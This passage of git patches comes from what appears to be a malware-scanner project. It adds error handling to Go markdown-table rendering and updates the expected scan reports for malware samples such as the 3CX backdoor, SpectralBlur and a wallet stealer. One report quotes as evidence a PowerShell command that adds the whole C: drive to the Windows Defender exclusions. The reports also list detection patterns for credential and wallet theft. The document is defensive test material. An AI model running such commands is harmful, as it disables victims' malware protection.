 | -CRITICAL | [3P/sig_base/nk_3cx_dylib](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214) | [Detects malicious DYLIB files related to 3CX compromise](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/), by Florian Roth (Nextron Systems) | `$xc1`<br>`$xc2`<br>`$xc3` |
diff --git a/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff
index d8e821280..a6594bcba 100644
--- a/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff
@@ -3,7 +3,7 @@
 ### 22 new behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | +CRITICAL | **[3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_smooth_operator.yar#L1-L16)** | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) |
 | +CRITICAL | **[3P/sig_base/3cxdesktopapp_backdoor](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275)** | [Detects 3CXDesktopApp MacOS Backdoor component](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/), by X__Junior (Nextron Systems) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code)<br>`$sa1`<br>`$sa2`<br>`$op1`<br>`$op2` |
 | +CRITICAL | **[3P/sig_base/nk_3cx_dylib](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214)** | [Detects malicious DYLIB files related to 3CX compromise](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/), by Florian Roth (Nextron Systems) | `$xc1`<br>`$xc2`<br>`$xc3` |
diff --git a/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff
index 3de65c25b..cfae167e1 100644
--- a/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff
@@ -3,14 +3,14 @@
 ### 2 new behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | +LOW | **[fs/directory/traverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-traverse.yara#fts)** | traverse filesystem hierarchy | [_fts_children](https://github.com/search?q=_fts_children&type=code)<br>[_fts_close](https://github.com/search?q=_fts_close&type=code)<br>[_fts_read](https://github.com/search?q=_fts_read&type=code)<br>[_fts_open](https://github.com/search?q=_fts_open&type=code)<br>[_fts_set](https://github.com/search?q=_fts_set&type=code) |
 | +LOW | **[fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink)** | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) |
 
 ### 14 removed behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | -MEDIUM | [crypto/encrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/encrypt.yara#encrypt) | encrypts data | [Encryption initializati](https://github.com/search?q=Encryption+initializati&type=code)<br>[Encryption info](https://github.com/search?q=Encryption+info&type=code) |
 | -MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) |
 | -MEDIUM | [impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent) | references an 'agent' | [user_agent](https://github.com/search?q=user_agent&type=code) |
diff --git a/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff b/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff
index d8e821280..a6594bcba 100644
--- a/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff
@@ -3,7 +3,7 @@
 ### 22 new behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | +CRITICAL | **[3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_smooth_operator.yar#L1-L16)** | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) |
 | +CRITICAL | **[3P/sig_base/3cxdesktopapp_backdoor](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275)** | [Detects 3CXDesktopApp MacOS Backdoor component](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/), by X__Junior (Nextron Systems) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code)<br>`$sa1`<br>`$sa2`<br>`$op1`<br>`$op2` |
 | +CRITICAL | **[3P/sig_base/nk_3cx_dylib](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214)** | [Detects malicious DYLIB files related to 3CX compromise](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/), by Florian Roth (Nextron Systems) | `$xc1`<br>`$xc2`<br>`$xc3` |
diff --git a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff
index d8e821280..a6594bcba 100644
--- a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff
@@ -3,7 +3,7 @@
 ### 22 new behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | +CRITICAL | **[3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_smooth_operator.yar#L1-L16)** | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) |
 | +CRITICAL | **[3P/sig_base/3cxdesktopapp_backdoor](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275)** | [Detects 3CXDesktopApp MacOS Backdoor component](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/), by X__Junior (Nextron Systems) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code)<br>`$sa1`<br>`$sa2`<br>`$op1`<br>`$op2` |
 | +CRITICAL | **[3P/sig_base/nk_3cx_dylib](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214)** | [Detects malicious DYLIB files related to 3CX compromise](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/), by Florian Roth (Nextron Systems) | `$xc1`<br>`$xc2`<br>`$xc3` |
diff --git a/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff b/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff
index 9c13f30ad..69c803731 100644
--- a/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff
@@ -3,7 +3,7 @@
 ### 14 new behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | +MEDIUM | **[crypto/encrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/encrypt.yara#encrypt)** | encrypts data | [Encryption initializati](https://github.com/search?q=Encryption+initializati&type=code)<br>[Encryption info](https://github.com/search?q=Encryption+info&type=code) |
 | +MEDIUM | **[fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path)** | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) |
 | +MEDIUM | **[impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent)** | references an 'agent' | [user_agent](https://github.com/search?q=user_agent&type=code) |
@@ -22,7 +22,7 @@
 ### 2 removed behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | -LOW | [fs/directory/traverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-traverse.yara#fts) | traverse filesystem hierarchy | [_fts_children](https://github.com/search?q=_fts_children&type=code)<br>[_fts_close](https://github.com/search?q=_fts_close&type=code)<br>[_fts_read](https://github.com/search?q=_fts_read&type=code)<br>[_fts_open](https://github.com/search?q=_fts_open&type=code)<br>[_fts_set](https://github.com/search?q=_fts_set&type=code) |
 | -LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) |
 
diff --git a/tests/macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md b/tests/macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md
index eef35690b..684a43451 100644
--- a/tests/macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md
+++ b/tests/macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md
@@ -1,7 +1,7 @@
 ## macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare [🛑 HIGH]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | HIGH | [anti-static/macho/footer](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/macho/footer.yara#high_entropy_trailer) | [higher-entropy machO trailer (normally NULL) - possible viral infection](https://www.virusbulletin.com/virusbulletin/2013/06/multiplatform-madness) | [_PAGEZERO](https://github.com/search?q=_PAGEZERO&type=code) |
 | HIGH | [impact/remote_access/net_term](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_term.yara#spectralblur_alike) | uploads, provides a terminal, runs program | [tcsetattr](https://github.com/search?q=tcsetattr&type=code)<br>[_waitpid](https://github.com/search?q=_waitpid&type=code)<br>[_unlink](https://github.com/search?q=_unlink&type=code)<br>[execve](https://github.com/search?q=execve&type=code)<br>[upload](https://github.com/search?q=upload&type=code)<br>[_uname](https://github.com/search?q=_uname&type=code)<br>[shell](https://github.com/search?q=shell&type=code) |
 | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) |
diff --git a/tests/macOS/clean/ls.mdiff b/tests/macOS/clean/ls.mdiff
index c8ec1b9b0..e56ed61a4 100644
--- a/tests/macOS/clean/ls.mdiff
+++ b/tests/macOS/clean/ls.mdiff
@@ -3,14 +3,14 @@
 ### 2 new behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | +LOW | **[fs/directory/traverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-traverse.yara#fts)** | traverse filesystem hierarchy | [_fts_children](https://github.com/search?q=_fts_children&type=code)<br>[_fts_close](https://github.com/search?q=_fts_close&type=code)<br>[_fts_read](https://github.com/search?q=_fts_read&type=code)<br>[_fts_open](https://github.com/search?q=_fts_open&type=code)<br>[_fts_set](https://github.com/search?q=_fts_set&type=code) |
 | +LOW | **[net/http](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http.yara#http)** | Uses the HTTP protocol | [http](https://github.com/search?q=http&type=code) |
 
 ### 6 removed behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | -MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) |
 | -LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)<br>[x86](https://github.com/search?q=x86&type=code) |
 | -LOW | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref) | references a specific operating system | [https://](https://)<br>[linux](https://github.com/search?q=linux&type=code) |
diff --git a/tests/windows/2024.Sharp/sharpil_RAT.exe.md b/tests/windows/2024.Sharp/sharpil_RAT.exe.md
index b9609b4f3..07f632913 100644
--- a/tests/windows/2024.Sharp/sharpil_RAT.exe.md
+++ b/tests/windows/2024.Sharp/sharpil_RAT.exe.md
@@ -1,7 +1,7 @@
 ## windows/2024.Sharp/sharpil_RAT.exe [😈 CRITICAL]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | CRITICAL | [3P/ditekshen/telegramchatbot](https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1293-L1308) | Detects executables using Telegram Chat Bot, by [ditekSHen](https://github.com/ditekshen/detection) | `$s1`<br>`$s2`<br>`$s3`<br>`$s4`<br>`$p1`<br>`$p2`<br>`$p3`<br>`$p4` |
 | HIGH | [net/email/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/email/send.yara#SMTPClient_Send_creds) | sends e-mail with a hardcoded credentials | [NetworkCredential](https://github.com/search?q=NetworkCredential&type=code) |
 | MEDIUM | [c2/addr/discord](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/discord.yara#discord) | may report back to 'Discord' | [Discord](https://github.com/search?q=Discord&type=code) |
diff --git a/tests/windows/2024.aspdasdksa2/Nil.exe.md b/tests/windows/2024.aspdasdksa2/Nil.exe.md
index 29a700021..a552ac1fe 100644
--- a/tests/windows/2024.aspdasdksa2/Nil.exe.md
+++ b/tests/windows/2024.aspdasdksa2/Nil.exe.md
@@ -1,7 +1,7 @@
 ## windows/2024.aspdasdksa2/Nil.exe [😈 CRITICAL]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | CRITICAL | [impact/degrade/win_defender](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/degrade/win_defender.yara#win_defender_exclusion) | Uses powershell to define Windows Defender exclusions | [powershell -Command "Add-MpPreference -ExclusionPath 'C:\'"](https://github.com/search?q=powershell+-Command+%22Add-MpPreference+-ExclusionPath+%27C%3A%5C%27%22&type=code) |
 | MEDIUM | [anti-behavior/anti_debugger](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/anti-debugger.yara#win_debugger_present) | Detects if process is being executed within a debugger or VM | [UnhandledExceptionFilter](https://github.com/search?q=UnhandledExceptionFilter&type=code)<br>[IsDebuggerPresent](https://github.com/search?q=IsDebuggerPresent&type=code) |
 | MEDIUM | [data/embedded/app_manifest](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/app-manifest.yara#app_manifest) | [Contains embedded Microsoft Windows application manifest](https://learn.microsoft.com/en-us/cpp/build/reference/manifestuac-embeds-uac-information-in-manifest?view=msvc-170) | [requestedExecutionLevel](https://github.com/search?q=requestedExecutionLevel&type=code)<br>[requestedPrivileges](https://github.com/search?q=requestedPrivileges&type=code) |

From 306e852290de17b2166c42a979ee7b5e19bfe129 Mon Sep 17 00:00:00 2001
From: egibs <20933572+egibs@users.noreply.github.com>
Date: Thu, 29 May 2025 08:12:37 -0500
Subject: [PATCH 2/4] Handle checking for new errors

Signed-off-by: egibs <20933572+egibs@users.noreply.github.com>
---
 pkg/render/markdown.go | 48 ++++++++++++++++++++++++++++++------------
 1 file changed, 35 insertions(+), 13 deletions(-)

diff --git a/pkg/render/markdown.go b/pkg/render/markdown.go
index d5ef5d94c..13468b8f4 100644
--- a/pkg/render/markdown.go
+++ b/pkg/render/markdown.go
@@ -56,7 +56,9 @@ func (r Markdown) Scanning(_ context.Context, _ string) {}
 
 func (r Markdown) File(ctx context.Context, fr *malcontent.FileReport) error {
 	if fr.Skipped == "" && len(fr.Behaviors) > 0 {
-		markdownTable(ctx, fr, r.w, tableConfig{Title: fmt.Sprintf("## %s [%s]", fr.Path, mdRisk(fr.RiskScore, fr.RiskLevel))})
+		if err := markdownTable(ctx, fr, r.w, tableConfig{Title: fmt.Sprintf("## %s [%s]", fr.Path, mdRisk(fr.RiskScore, fr.RiskLevel))}); err != nil {
+			return err
+		}
 	}
 	return nil
 }
@@ -71,11 +73,15 @@ func (r Markdown) Full(ctx context.Context, _ *malcontent.Config, rep *malconten
 	}
 
 	for removed := rep.Diff.Removed.Oldest(); removed != nil; removed = removed.Next() {
-		markdownTable(ctx, removed.Value, r.w, tableConfig{Title: fmt.Sprintf("## Deleted: %s [%s]", removed.Key, mdRisk(removed.Value.RiskScore, removed.Value.RiskLevel)), DiffRemoved: true})
+		if err := markdownTable(ctx, removed.Value, r.w, tableConfig{Title: fmt.Sprintf("## Deleted: %s [%s]", removed.Key, mdRisk(removed.Value.RiskScore, removed.Value.RiskLevel)), DiffRemoved: true}); err != nil {
+			return err
+		}
 	}
 
 	for added := rep.Diff.Added.Oldest(); added != nil; added = added.Next() {
-		markdownTable(ctx, added.Value, r.w, tableConfig{Title: fmt.Sprintf("## Added: %s [%s]", added.Key, mdRisk(added.Value.RiskScore, added.Value.RiskLevel)), DiffAdded: true})
+		if err := markdownTable(ctx, added.Value, r.w, tableConfig{Title: fmt.Sprintf("## Added: %s [%s]", added.Key, mdRisk(added.Value.RiskScore, added.Value.RiskLevel)), DiffAdded: true}); err != nil {
+			return err
+		}
 	}
 
 	for modified := rep.Diff.Modified.Oldest(); modified != nil; modified = modified.Next() {
@@ -129,12 +135,14 @@ func (r Markdown) Full(ctx context.Context, _ *malcontent.Config, rep *malconten
 			if count > 1 {
 				noun = "behaviors"
 			}
-			markdownTable(ctx, modified.Value, r.w, tableConfig{
+			if err := markdownTable(ctx, modified.Value, r.w, tableConfig{
 				Title:        fmt.Sprintf("### %d %s %s", count, qual, noun),
 				SkipRemoved:  true,
 				SkipExisting: true,
 				SkipNoDiff:   true,
-			})
+			}); err != nil {
+				return err
+			}
 		}
 
 		if removed > 0 {
@@ -144,12 +152,14 @@ func (r Markdown) Full(ctx context.Context, _ *malcontent.Config, rep *malconten
 			if count > 1 {
 				noun = "behaviors"
 			}
-			markdownTable(ctx, modified.Value, r.w, tableConfig{
+			if err := markdownTable(ctx, modified.Value, r.w, tableConfig{
 				Title:        fmt.Sprintf("### %d %s %s", count, qual, noun),
 				SkipAdded:    true,
 				SkipExisting: true,
 				SkipNoDiff:   true,
-			})
+			}); err != nil {
+				return err
+			}
 		}
 
 		if noDiff > 0 {
@@ -159,9 +169,13 @@ func (r Markdown) Full(ctx context.Context, _ *malcontent.Config, rep *malconten
 	return nil
 }
 
-func markdownTable(ctx context.Context, fr *malcontent.FileReport, w io.Writer, rc tableConfig) {
-	if ctx.Err() != nil || fr.Skipped != "" {
-		return
+func markdownTable(ctx context.Context, fr *malcontent.FileReport, w io.Writer, rc tableConfig) error {
+	if ctx.Err() != nil {
+		return ctx.Err()
+	}
+
+	if fr.Skipped != "" {
+		return nil
 	}
 
 	kbs := make([]KeyedBehavior, 0, len(fr.Behaviors))
@@ -173,7 +187,7 @@ func markdownTable(ctx context.Context, fr *malcontent.FileReport, w io.Writer,
 		if fr.PreviousRelPath != "" && rc.Title != "" {
 			fmt.Fprintf(w, "%s\n\n", rc.Title)
 		}
-		return
+		return nil
 	}
 
 	if rc.Title != "" {
@@ -260,12 +274,20 @@ func markdownTable(ctx context.Context, fr *malcontent.FileReport, w io.Writer,
 		tablewriter.WithRowAutoWrap(0),
 	)
 	table.Header([]string{"Risk", "Key", "Description", "Evidence"})
-	table.Bulk(data) // Add Bulk Data
-	table.Render()
+	// Add Bulk Data
+	if err := table.Bulk(data); err != nil {
+		return err
+	}
+
+	if err := table.Render(); err != nil {
+		return err
+	}
 
 	// remove excess whitespace
 	s := buf.String()
 	s = excessSpaceRe.ReplaceAllString(s, " ")
 	s = excessDashRe.ReplaceAllString(s, "--")
 	fmt.Fprintf(w, "%s\n", s)
+
+	return nil
 }

From e4c72b0858734465768c1147bf6c2c026dd8e481 Mon Sep 17 00:00:00 2001
From: egibs <20933572+egibs@users.noreply.github.com>
Date: Thu, 29 May 2025 08:28:33 -0500
Subject: [PATCH 3/4] Tweak alignment

Signed-off-by: egibs <20933572+egibs@users.noreply.github.com>
---
 pkg/render/markdown.go                                     | 7 ++++++-
 .../2024.lottie-player/lottie-player.min.js.mdiff          | 4 ++--
 tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md          | 2 +-
 tests/linux/2023.ConnectBack/tiny.md                       | 2 +-
 tests/linux/2024.Darkcracks/darkcracks.sh.md               | 2 +-
 tests/linux/UPX/06ed158.md                                 | 2 +-
 tests/linux/clean/code-oss.md                              | 2 +-
 tests/linux/clean/cpack.md                                 | 2 +-
 tests/linux/clean/ls.x86_64.md                             | 2 +-
 tests/linux/clean/lslogins.md                              | 2 +-
 tests/linux/clean/pandoc.md                                | 2 +-
 tests/linux/clean/ping.x86_64.md                           | 2 +-
 tests/linux/clean/qemu-system-xtensa.md                    | 2 +-
 tests/linux/clean/redis-server.aarch64.md                  | 2 +-
 tests/linux/clean/slack.md                                 | 2 +-
 tests/linux/clean/tree-sitter.md                           | 2 +-
 tests/linux/clean/trufflehog.md                            | 2 +-
 tests/linux/clean/viewgam.md                               | 2 +-
 tests/linux/clean/zipdetails.md                            | 2 +-
 tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff       | 2 +-
 tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff       | 2 +-
 tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff      | 4 ++--
 tests/macOS/2023.3CX/libffmpeg.dirty.mdiff                 | 2 +-
 tests/macOS/2023.3CX/libffmpeg.increase.mdiff              | 2 +-
 tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff    | 4 ++--
 .../macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md  | 2 +-
 tests/macOS/clean/ls.mdiff                                 | 4 ++--
 tests/windows/2024.Sharp/sharpil_RAT.exe.md                | 2 +-
 tests/windows/2024.aspdasdksa2/Nil.exe.md                  | 2 +-
 29 files changed, 38 insertions(+), 33 deletions(-)

diff --git a/pkg/render/markdown.go b/pkg/render/markdown.go
index 13468b8f4..8891710f1 100644
--- a/pkg/render/markdown.go
+++ b/pkg/render/markdown.go
@@ -269,8 +269,13 @@ func markdownTable(ctx context.Context, fr *malcontent.FileReport, w io.Writer,
 
 	buf := bytes.NewBuffer([]byte{})
 	table := tablewriter.NewTable(buf,
+		tablewriter.WithConfig(tablewriter.Config{
+			Header: tw.CellConfig{
+				Alignment: tw.CellAlignment{Global: tw.AlignLeft},
+			},
+		}),
 		tablewriter.WithRenderer(renderer.NewMarkdown()),
-		tablewriter.WithRendition(tw.Rendition{Symbols: tw.NewSymbols(tw.StyleDefault)}),
+		tablewriter.WithRendition(tw.Rendition{Symbols: tw.NewSymbols(tw.StyleMarkdown)}),
 		tablewriter.WithRowAutoWrap(0),
 	)
 	table.Header([]string{"Risk", "Key", "Description", "Evidence"})
diff --git a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff
index 493e9d08d..60abcc9f1 100644
--- a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff
+++ b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff
@@ -3,7 +3,7 @@
 ### 49 new behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | +CRITICAL | **[exfil/stealer/wallet](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/stealer/wallet.yara#crypto_stealer_names)** | makes HTTPS connections and references multiple wallets by name | [Coinbase_Wordmark_SubBrands_ALL](https://github.com/search?q=Coinbase_Wordmark_SubBrands_ALL&type=code)<br>[CoinbaseInjectedProvider](https://github.com/search?q=CoinbaseInjectedProvider&type=code)<br>[CoinbaseWalletDeeplink](https://github.com/search?q=CoinbaseWalletDeeplink&type=code)<br>[CoinbaseInjectedSigner](https://github.com/search?q=CoinbaseInjectedSigner&type=code)<br>[CoinbaseWalletProvider](https://github.com/search?q=CoinbaseWalletProvider&type=code)<br>[CoinbaseTransactions](https://github.com/search?q=CoinbaseTransactions&type=code)<br>[CoinbaseWalletRound](https://github.com/search?q=CoinbaseWalletRound&type=code)<br>[CoinbaseWalletSteps](https://github.com/search?q=CoinbaseWalletSteps&type=code)<br>[CoinbaseWalletLogo](https://github.com/search?q=CoinbaseWalletLogo&type=code)<br>[CoinbaseWalletSDK](https://github.com/search?q=CoinbaseWalletSDK&type=code)<br>[CoinbaseOnRampURL](https://github.com/search?q=CoinbaseOnRampURL&type=code)<br>[CoinbaseConnector](https://github.com/search?q=CoinbaseConnector&type=code)<br>[CoinbaseBrowser](https://github.com/search?q=CoinbaseBrowser&type=code)<br>[BraveWallet](https://github.com/search?q=BraveWallet&type=code)<br>[Ronin](https://github.com/search?q=Ronin&type=code)<br>[http](https://github.com/search?q=http&type=code) |
 | +HIGH | **[anti-static/obfuscation/bitwise](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/bitwise.yara#unsigned_bitwise_math_excess)** | [uses an excessive amount of unsigned bitwise math](https://www.reversinglabs.com/blog/python-downloader-highlights-noise-problem-in-open-source-threat-detection) | [function(](https://github.com/search?q=function%28&type=code)<br>[charAt(s](https://github.com/search?q=charAt%28s&type=code)<br>[charAt(a](https://github.com/search?q=charAt%28a&type=code)<br>[charAt(n](https://github.com/search?q=charAt%28n&type=code)<br>[charAt(c](https://github.com/search?q=charAt%28c&type=code)<br>[charAt(t](https://github.com/search?q=charAt%28t&type=code)<br>[charAt(u](https://github.com/search?q=charAt%28u&type=code)<br>[charAt(w](https://github.com/search?q=charAt%28w&type=code)<br>[e>>>28](https://github.com/search?q=e%3E%3E%3E28&type=code)<br>[c>>>31](https://github.com/search?q=c%3E%3E%3E31&type=code)<br>[e>>>64](https://github.com/search?q=e%3E%3E%3E64&type=code)<br>[t>>>64](https://github.com/search?q=t%3E%3E%3E64&type=code)<br>[a>>>16](https://github.com/search?q=a%3E%3E%3E16&type=code)<br>[e>>>24](https://github.com/search?q=e%3E%3E%3E24&type=code)<br>[a>>>13](https://github.com/search?q=a%3E%3E%3E13&type=code)<br>[r>>>10](https://github.com/search?q=r%3E%3E%3E10&type=code)<br>[e>>>32](https://github.com/search?q=e%3E%3E%3E32&type=code)<br>[e>>>10](https://github.com/search?q=e%3E%3E%3E10&type=code)<br>[e>>>16](https://github.com/search?q=e%3E%3E%3E16&type=code)<br>[o>>>16](https://github.com/search?q=o%3E%3E%3E16&type=code)<br>[o>>>24](https://github.com/search?q=o%3E%3E%3E24&type=code)<br>[o>>>22](https://github.com/search?q=o%3E%3E%3E22&type=code)<br>[a>>>26](https://github.com/search?q=a%3E%3E%3E26&type=code)<br>[s>>>26](https://github.com/search?q=s%3E%3E%3E26&type=code)<br>[d>>>26](https://github.com/search?q=d%3E%3E%3E26&type=code)<br>[e>>>26](https://github.com/search?q=e%3E%3E%3E26&type=code)<br>[n>>>13](https://github.com/search?q=n%3E%3E%3E13&type=code)<br>[n>>>24](https://github.com/search?q=n%3E%3E%3E24&type=code)<br>[s>>>24](https://github.com/search?q=s%3E%3E%3E24&type=code)<br>[u>>>24](https://github.com/search?q=u%3E%3E%3E24&type=code)<br>[a>>>32](https://github.com/search?q=a%3E%3E%3E32&type=code)<br>[u>>>31](https://github.com/search?q=u%3E%3E%3E31&type=code)<br>[i>>>27](https://github.com/search?q=i%3E%3E%3E27&type=code)<br>[p>>>18](https://github.com/search?q=p